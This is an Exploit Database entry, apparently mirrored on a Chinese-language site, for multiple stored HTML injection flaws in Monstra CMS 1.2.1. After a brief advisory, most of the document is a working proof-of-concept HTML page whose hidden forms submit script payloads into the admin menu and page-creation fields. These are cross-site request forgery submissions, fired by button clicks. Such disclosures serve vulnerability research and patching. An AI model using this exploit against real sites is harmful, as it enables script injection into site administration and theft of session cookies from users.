Monstra CMS 1.2.1 – Multiple HTML Injection Vulnerabilities

• Exploit Database
• 38 阅读

• 作者： LiquidWorm
  日期： 2012-08-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37651/

• <!--source: https://www.securityfocus.com/bid/55171/info
  
  Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
  
  Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
  
  Monstra 1.2.1 is vulnerable; other versions may also be affected. -->
  
  <html> 
  <head> 
  <title>Monstra 1.2.1 Multiple HTML Injection Vulnerabilities</title> 
  </head> 
  <body> 
  <form id="add_menu" method="POST" action="http://www.example.com/monstra/admin/index.php?id=menu&action=add">
   <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" />
   <input type="hidden" name="menu_add_item" value="Save" />
   <input type="hidden" name="menu_item_link" value='"><script>alert(1);</script>' />
   <input type="hidden" name="menu_item_name" value='"><script>alert(2);</script>' />
   <input type="hidden" name="menu_item_order" value="0" />
   <input type="hidden" name="menu_item_target" value="" /> 
  </form> 
  
  <form id="add_page" method="POST" action="http://www.example.com/monstra/admin/index.php?id=pages&action=add_page">
   <input type="hidden" name="add_page_and_exit" value="Save and exit" />
   <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" />
   <input type="hidden" name="day" value="21" />
   <input type="hidden" name="editor" value="Tojmi Sesvidja" />
   <input type="hidden" name="minute" value="17" />
   <input type="hidden" name="month" value="08" />
   <input type="hidden" name="page_description" value="Zero Science Lab" />
   <input type="hidden" name="page_keywords" value="ZSL-2012-5101" />
   <input type="hidden" name="page_name" value="XSS" />
   <input type="hidden" name="page_title" value='"><script>alert(3);</script>' />
   <input type="hidden" name="pages" value="0" />
   <input type="hidden" name="second" value="29" />
   <input type="hidden" name="status" value="published" />
   <input type="hidden" name="templates" value="index" />
   <input type="hidden" name="year" value="2012" /> 
  </form> 
  
  <script type="text/javascript"> 
  
  function xss1(){
  document.forms["add_menu"].submit();
  } 
  
  function xss2(){
  document.forms["add_page"].submit();
  } 
  
  </script> 
  
  <input type="button" value="Execute XSS 1" onClick="xss1()" /> 
  <br /><br /> 
  <input type="button" value="Execute XSS 2" onClick="xss2()" /> 
  
  </body> 
  </html>